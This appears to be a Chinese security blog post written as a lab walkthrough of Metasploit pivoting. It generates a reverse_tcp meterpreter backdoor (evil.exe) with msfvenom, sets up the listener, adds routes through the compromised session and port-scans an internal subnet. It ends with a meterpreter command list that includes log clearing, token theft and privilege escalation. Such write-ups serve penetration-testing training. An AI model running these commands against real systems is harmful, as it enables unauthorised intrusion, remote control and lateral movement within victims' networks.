跳板攻击之: MSF 添加路由方式渗透内网

跳板攻击之: MSF 添加路由方式渗透内网

目录

1 Metasploit 跳板攻击: 添加路由方式原理

  • 通过网络层可达实现跳板攻击
  • 缺点是利用环境苛刻,只能在 Metasploit 中使用。易被防火墙拦截流量。

2 实验环境

image-20210904133542442

2.1 建立 meterpreter 反向连接

  1. 生成 Metaspolit 后门程序

    msfvenom  -p windows/meterpreter/reverse_tcp lhost=192.168.0.2 lport=4444 -f exe > /var/www/html/evil.exe

  2. kali 配置监听 meterpreter 反向连接

    use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.2
run

  3. WEB Server 下载 Metaspolit 后门程序,并打开程序

  4. meterpreter 反向连接建立成功

    image-20210901115116102

2.2 查看当前系统信息

  1. 查看当前系统路由信息,发现存在新网段:10.2.1.0/24

    ipconfig
route list

    image-20210904154859336

    image-20210904154622491

  2. 添加去往该目标网段的路由

    run post/multi/manage/autoroute
run autoroute -p

    image-20210904155138615

    查看添加的路由,下一跳指向 session 1

2.3 利用增加的路由扫描新网段的主机

  • 使用 MSF 端口扫描模块进行扫描

    use auxiliary/scanner/portscan/tcp
set ports 135,139,445,23,80,8080
set rhosts 10.2.1.1-10.2.1.3

    image-20210904155302807

  • NMAP 扫描:由结果可知端口被防火墙过滤

    db_nmap -sV -p23,80 10.2.1.3
# 如果扫描的款数据库未连接,需要先执行 msfdb init 后,再重新打开 msfconsole

    image-20210904155454589

3 meterpreter 基础命令

Stdapi: Networking Commands
===========================
Command       Description
-------       -----------
arp           Display the host ARP cache
getproxy      Display the current proxy configuration
ifconfig      Display interfaces
ipconfig      Display interfaces
netstat       Display the network connections
portfwd       Forward a local port to a remote service
resolve       Resolve a set of host names on the target
route         View and modify the routing table

Stdapi: System Commands
=======================
Command       Description
-------       -----------
clearev       Clear the event log
drop_token    Relinquishes any active impersonation token.
execute       Execute a command
getenv        Get one or more environment variable values
getpid        Get the current process identifier
getprivs      Attempt to enable all privileges available to the current process 尽可能提升权限
getsid        Get the SID of the user that the server is running as
getuid        Get the user that the server is running as 查看当前用户
kill          Terminate a process
localtime     Displays the target system local date and time
pgrep         Filter processes by name
pkill         Terminate processes by name
ps            List running processes 列出进程
reboot        Reboots the remote computer
reg           Modify and interact with the remote registry
rev2self      Calls RevertToSelf() on the remote machine
shell         Drop into a system command shell
shutdown      Shuts down the remote computer
steal_token   Attempts to steal an impersonation token from the target process
suspend       Suspends or resumes a list of processes
sysinfo       Gets information about the remote system, such as OS 查看系统信息
migrate       Migrate the server to another process 注入进程
getsystem     Attempt to elevate your privilege to that of local system. 通过各种攻击向量来提升本地系统权限
posted @   f_carey  阅读(1258)  评论(0编辑  收藏  举报
相关博文:
·  内网安全之:Metasploit 跳板攻击: 添加路由方式
·  内网安全之:Metasploit 跳板攻击:portfwd 端口转发与端口映射
·  meterpreter后渗透攻击
·  【收藏】MSF常用命令
·  渗透测试神器-msf基础
阅读排行:
· 震惊!C++程序真的从main开始吗?99%的程序员都答错了
· winform 绘制太阳,地球,月球 运作规律
· 【硬核科普】Trae如何「偷看」你的代码?零基础破解AI编程运行原理
· 上周热点回顾(3.3-3.9)
· 超详细:普通电脑也行Windows部署deepseek R1训练数据并当服务器共享给他人
点击右上角即可分享
微信分享提示
AI IDE Trae